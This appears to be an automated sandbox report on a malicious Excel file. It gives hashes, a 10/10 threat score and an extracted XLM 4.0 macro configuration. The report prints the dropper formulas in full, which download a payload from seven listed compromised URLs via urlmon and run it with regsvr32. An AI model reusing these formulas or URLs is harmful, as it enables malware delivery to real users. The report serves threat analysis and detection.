General

  • Target

    1d7d1250d9c6e7cd904b4fc18f6872b09330e861ca05d1a173d0a0b259d4c128

  • Size

    35KB

  • Sample

    241119-xg9p2szenb

  • MD5

    b3689cc900640a9cf6ca6ec8276428df

  • SHA1

    f4484c92b6e3f8df9efa600d4f635e8bd914e275

  • SHA256

    1d7d1250d9c6e7cd904b4fc18f6872b09330e861ca05d1a173d0a0b259d4c128

  • SHA512

    40823e02d5489f7b0a8b6fdf1dc4e630a512ba632a2b93bd4a0022de2164bffeae16f6c02d6c10940ee574d38c6e1f82b89fefc782a930edfe107b0e905e0dc8

  • SSDEEP

    768:Bsmn9tnd5euAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooofS:BFtndguUOZZ1ZYpoQ/pMA6Kt

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/

https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/

https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/

https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/

xlm40.dropper

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/

xlm40.dropper

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

xlm40.dropper

https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/

xlm40.dropper

https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/

xlm40.dropper

https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/

xlm40.dropper

https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/

xlm40.dropper

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/

xlm40.dropper

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

Targets

    • Target

      1d7d1250d9c6e7cd904b4fc18f6872b09330e861ca05d1a173d0a0b259d4c128

    • Size

      35KB

    • MD5

      b3689cc900640a9cf6ca6ec8276428df

    • SHA1

      f4484c92b6e3f8df9efa600d4f635e8bd914e275

    • SHA256

      1d7d1250d9c6e7cd904b4fc18f6872b09330e861ca05d1a173d0a0b259d4c128

    • SHA512

      40823e02d5489f7b0a8b6fdf1dc4e630a512ba632a2b93bd4a0022de2164bffeae16f6c02d6c10940ee574d38c6e1f82b89fefc782a930edfe107b0e905e0dc8

    • SSDEEP

      768:Bsmn9tnd5euAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooofS:BFtndguUOZZ1ZYpoQ/pMA6Kt

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks